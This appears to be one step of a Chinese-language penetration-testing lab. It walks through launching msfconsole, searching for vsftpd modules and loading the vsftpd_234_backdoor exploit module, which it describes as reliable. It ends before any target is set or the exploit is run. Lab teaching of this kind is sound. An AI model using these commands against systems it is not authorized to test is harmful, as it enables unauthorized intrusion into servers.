选择 vsftpd_234_backdoor 漏洞利用模块
在本步骤中,你将启动 Metasploit Framework 并找到攻击 vsftpd 2.3.4 服务的正确漏洞利用模块。
首先,启动 Metasploit 控制台。我们使用 -q (quiet) 标志来跳过启动横幅,从而更快地启动。
msfconsole -q
Metasploit 加载后,你将看到 msf6 > 提示符。现在,你可以搜索与 vsftpd 相关的漏洞利用模块。使用 search 命令:
search vsftpd
Metasploit 将显示匹配模块的列表。你应该会看到一个专门针对 vsftpd 2.3.4 中后门的漏洞利用模块。
Matching Modules
================
## Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent Yes VSFTPD v2.3.4 Backdoor Command Execution
1 auxiliary/scanner/ftp/ftp_version normal No FTP Version Scanner
exploit/unix/ftp/vsftpd_234_backdoor 模块正是我们需要的。它的等级是 "excellent"(优秀),这意味着它非常可靠。要加载此模块,请使用 use 命令,后跟模块的完整名称或搜索结果中的编号。
use exploit/unix/ftp/vsftpd_234_backdoor
运行该命令后,你的提示符将变为 msf6 exploit(unix/ftp/vsftpd_234_backdoor) >,这表明漏洞利用模块现已激活。